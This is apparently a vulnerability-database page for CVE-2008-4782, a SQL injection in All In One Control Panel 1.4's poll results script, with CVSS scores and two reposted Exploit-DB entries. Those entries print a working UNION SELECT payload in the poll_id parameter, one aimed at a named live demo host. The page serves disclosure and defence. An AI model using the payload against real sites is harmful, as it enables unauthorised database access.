CVE-2008-4782
published 2008-10-29CVE-2008-4782: SQL injection vulnerability in public/code/cp_polls_results.php in All In One Control Panel (AIOCP) 1.4 allows remote attackers to execute arbitrary SQL…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.01%
58.7th percentile
SQL injection vulnerability in public/code/cp_polls_results.php in All In One Control Panel (AIOCP) 1.4 allows remote attackers to execute arbitrary SQL commands via the poll_id parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aiocp | aiocp | — | — |
| aiocp | aiocp | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
AIOCP 1.4 - 'poll_id' SQL Injection
exploitdb·2008-10-27
CVE-2008-4782 AIOCP 1.4 - 'poll_id' SQL Injection
AIOCP 1.4 - 'poll_id' SQL Injection
---
###########################################
# Aiocp 1.4 Remote SQL Injection vulnerability
#
# Found by : ExSploiters
#
# Contact : [email protected]
#
# Download : http://sourceforge.net/project/showfiles.php?group_id=159137&package_id=178594&release_id=619157
###########################################
PoC :
http://[target]/[path]/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6--
L!ve Demo :
http://demo.opensourcecms.com/aiocp/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6--
Greetz :
no one =)
# milw0rm.com [2008-10-27]
Exploit-DB
All In One 1.4 Control Panel - 'cp_polls_results.php' SQL Injection
exploitdb·2008-10-27
CVE-2008-4782 All In One 1.4 Control Panel - 'cp_polls_results.php' SQL Injection
All In One 1.4 Control Panel - 'cp_polls_results.php' SQL Injection
---
source: https://www.securityfocus.com/bid/31949/info
All In One Control Panel (AIOCP) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AIOCP 1.4 is vulnerable; other versions may also be affected.
http://www.example.com/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6--
No writeups or analysis indexed.
2008-10-29
Published